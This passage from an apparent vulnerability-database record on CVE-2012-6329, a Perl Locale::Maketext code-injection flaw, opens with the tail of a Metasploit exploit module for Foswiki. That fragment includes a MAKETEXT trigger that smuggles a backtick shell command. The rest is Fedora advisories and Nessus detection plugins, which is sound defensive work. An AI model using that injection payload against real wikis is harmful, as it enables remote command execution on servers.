\"#{@base}#{@page}\",\n 'cookie' => \"FOSWIKISID=#{session}\"\n })\n if not res or res.code != 200 or res.body !~ /HASH/\n print_status(\"#{res.code}\\n#{res.body}\")\n fail_with(Failure::Unknown, \"Error executing the payload\")\n end\n\n print_good(\"Exploitation was successful\")\n\n end\nend\n\n=begin\n\n* Trigger:\n\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\n\n=end\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/foswiki_maketext.rb"}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], 
"description": "Perl is a high-level programming language with roots in C, sed, awk and shell scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A large proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-02-19T01:37:56", "published": "2013-02-19T01:37:56", "id": "FEDORA:942C320E6D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-5.14.3-221.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "Perl is a high-level programming language with roots in C, sed, awk and shell scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A large proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. 
", "modified": "2013-01-30T00:54:03", "published": "2013-01-30T00:54:03", "id": "FEDORA:D263821ACF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: perl-5.16.2-237.fc18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2728", "CVE-2012-6329"], "description": "Perl is a high-level programming language with roots in C, sed, awk and shell scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A large proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-01-24T21:54:55", "published": "2013-01-24T21:54:55", "id": "FEDORA:8065A20A8B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: perl-5.14.3-205.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language with roots in C, sed, awk and shell scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A large proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. 
Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-03-22T00:48:54", "published": "2013-03-22T00:48:54", "id": "FEDORA:2394F21ABD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: perl-5.16.2-240.fc18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language with roots in C, sed, awk and shell scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A large proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. 
", "modified": "2013-04-03T04:55:43", "published": "2013-04-03T04:55:43", "id": "FEDORA:8ABCA212D1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-5.14.4-224.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "description": "Remote code execution vulnerability in TWiki\n\nVulnerability Type: Remote Command Execution", "modified": "2013-04-02T00:00:00", "published": "2013-01-13T00:00:00", "id": "E-304", "href": "", "type": "dsquare", "title": "TWiki 5.1.2 RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-17T14:01:08", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The _compile function in Maketext.pm in the\n Locale::Maketext implementation in Perl before 5.17.7\n does not properly handle backslashes and fully qualified\n method names during compilation of bracket notation,\n which allows context-dependent attackers to execute\n arbitrary commands via crafted input to an application\n that accepts translation strings from users, as\n demonstrated by the TWiki application before 5.1.3, and\n the Foswiki application 1.0.x through 1.0.10 and 1.1.x\n through 1.1.6. 
(CVE-2012-6329)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : perl-58 (cve_2012_6329_code_injection1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2015-01-19T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1", "p-cpe:/a:oracle:solaris:perl-58"], "id": "SOLARIS11_PERL-58_20130716.NASL", "href": "https://www.tenable.com/plugins/nessus/80730", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80730);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-6329\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : perl-58 (cve_2012_6329_code_injection1)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The _compile function in Maketext.pm in the\n Locale::Maketext implementation in Perl before 5.17.7\n does not properly handle backslashes and fully qualified\n method names during compilation of bracket notation,\n which allows context-dependent attackers to execute\n arbitrary commands via crafted input to an application\n that accepts translation strings from users, as\n demonstrated by the TWiki application before 5.1.3, and\n the Foswiki application 1.0.x through 1.0.10 and 1.1.x\n through 1.1.6. 
(CVE-2012-6329)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-6329-code-injection-vulnerability-in-perl-58\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f277a95\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.7.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:perl-58\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^perl-58$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-58\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.7.0.5.0\", sru:\"SRU 11.1.7.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : perl-58\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"perl-58\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:26:27", "description": "It was discovered that Perl's Locale::Maketext module incorrectly\nhandled backslashes and fully qualified method names. An attacker\ncould possibly use this flaw to execute arbitrary code when an\napplication used untrusted templates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "published": "2014-02-06T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 12.10 : perl vulnerability (USN-2099-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2014-02-06T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:perl-modules", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2099-1.NASL", "href": "https://www.tenable.com/plugins/nessus/72366", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2099-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72366);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"USN\", value:\"2099-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 12.10 : perl vulnerability (USN-2099-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Perl's Locale::Maketext module incorrectly\nhandled backslashes and fully qualified method names. 
An attacker\ncould possibly use this flaw to execute arbitrary code when an\napplication used untrusted templates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2099-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected perl-modules package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:perl-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"perl-modules\", pkgver:\"5.10.1-8ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"perl-modules\", pkgver:\"5.14.2-6ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"perl-modules\", pkgver:\"5.14.2-13ubuntu0.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:18:39", "description": "The version of Perl on the remote host is affected by a 
code execution\nvulnerability. \n\nThe _compile function in Locale::Maketext in Perl before 5.17.7 does\nnot properly handle backslashes and fully qualified method names\nduring compilation of bracket notation. This could allow context-\ndependent attackers to execute arbitrary commands via crafted input.", "edition": 29, "published": "2014-04-28T00:00:00", "title": "AIX Perl Advisory : perl_advisory4.asc", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2014-04-28T00:00:00", "cpe": ["cpe:/a:perl:perl", "cpe:/o:ibm:aix"], "id": "AIX_PERL_ADVISORY4.NASL", "href": "https://www.tenable.com/plugins/nessus/73735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory perl_advisory4.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73735);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56852);\n\n script_name(english:\"AIX Perl Advisory : perl_advisory4.asc\");\n script_summary(english:\"Checks the version of the perl package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote AIX host has a vulnerable version of Perl.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Perl on the remote host is affected by a code execution\nvulnerability. \n\nThe _compile function in Locale::Maketext in Perl before 5.17.7 does\nnot properly handle backslashes and fully qualified method names\nduring compilation of bracket notation. 
This could allow context-\ndependent attackers to execute arbitrary commands via crafted input.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\");\n script_set_attribute(attribute:\"solution\", value:\n\"A fix is available, and it can be downloaded from the AIX website.\nFor AIX 5.3 or AIX 6.1, use perl61.zip, and for AIX 7.1 use\nperl71.zip.\n\nIMPORTANT : If possible, it is recommended that a mksysb backup of the\nsystem be created. Verify it is both bootable and readable before\nproceeding. \n\nTo preview the fix installation :\n\n installp -apYd . perl\n\nTo install the fix package :\n\n installp -aXYd . perl\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:perl:perl\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/28\");\n\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\ninclude(\"aix.inc\");\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item_or_exit(\"Host/AIX/version\");\nif ( oslevel != \"AIX-5.3\" && oslevel != \"AIX-6.1\" && oslevel != \"AIX-7.1\" )\n{\n oslevel = ereg_replace(string:oslevel, pattern:\"-\", replace:\" \");\n audit(AUDIT_OS_NOT, \"AIX 5.3 / 6.1 / 7.1\", oslevel);\n}\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif (aix_check_package(release:\"5.3\", ml:\"12\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.123\", fixpackagever:\"5.8.8.124\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", ml:\"07\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.122\", fixpackagever:\"5.8.8.123\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", ml:\"08\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.244\", fixpackagever:\"5.8.8.245\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", ml:\"09\", package:\"perl.rte\", minpackagever:\"5.8.8.0\", maxpackagever:\"5.8.8.366\", fixpackagever:\"5.8.8.367\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", ml:\"01\", package:\"perl.rte\", minpackagever:\"5.10.1.0\", maxpackagever:\"5.10.1.100\", fixpackagever:\"5.10.1.101\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", ml:\"02\", package:\"perl.rte\", minpackagever:\"5.10.1.0\", maxpackagever:\"5.10.1.150\", fixpackagever:\"5.10.1.151\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", 
ml:\"03\", package:\"perl.rte\", minpackagever:\"5.10.1.0\", maxpackagever:\"5.10.1.200\", fixpackagever:\"5.10.1.201\") > 0) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : aix_report_get()\n );\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl.rte\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:11:14", "description": "Fix double-free when loading Digest::SHA object representing the\nintermediate SHA state from a file (RT#82655)\n\nThe following command should be run without any errors.\n\nperl -MDigest::SHA -e 'my $d = Digest::SHA->new(256); $d->load('x');'\nFix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "published": "2013-02-19T00:00:00", "title": "Fedora 17 : perl-5.14.3-221.fc17 (2013-1836)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": "2013-02-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:perl", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-1836.NASL", "href": "https://www.tenable.com/plugins/nessus/64673", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1836.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64673);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6329\");\n script_bugtraq_id(56950);\n script_xref(name:\"FEDORA\", value:\"2013-1836\");\n\n script_name(english:\"Fedora 17 : perl-5.14.3-221.fc17 (2013-1836)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix 
double-free when loading Digest::SHA object representing the\nintermediate SHA state from a file (RT#82655)\n\nThe following command should be run without any errors.\n\nperl -MDigest::SHA -e 'my $d = Digest::SHA->new(256); $d->load('x');'\nFix Locale::Maketext vulnerability allowing to cross-call functions\nfrom message catalogs (CVE-2012-6329).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=884354\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-February/098991.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ef791a17\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/04\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"perl-5.14.3-221.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:56:24", "description": "The remote host is affected by the vulnerability described in GLSA-201410-02\n(Perl, Perl Locale-Maketext module: Multiple vulnerabilities)\n\n Two vulnerabilities have been reported in the Locale-Maketext module for\n Perl, which can be exploited by malicious users to compromise an\n application using the module.\n The vulnerabilities are caused due to the “_compile()” function not\n properly sanitising input, which can be exploited to inject and execute\n arbitrary Perl code.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "published": "2014-10-13T00:00:00", "title": "GLSA-201410-02 : Perl, Perl Locale-Maketext module: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6329"], "modified": 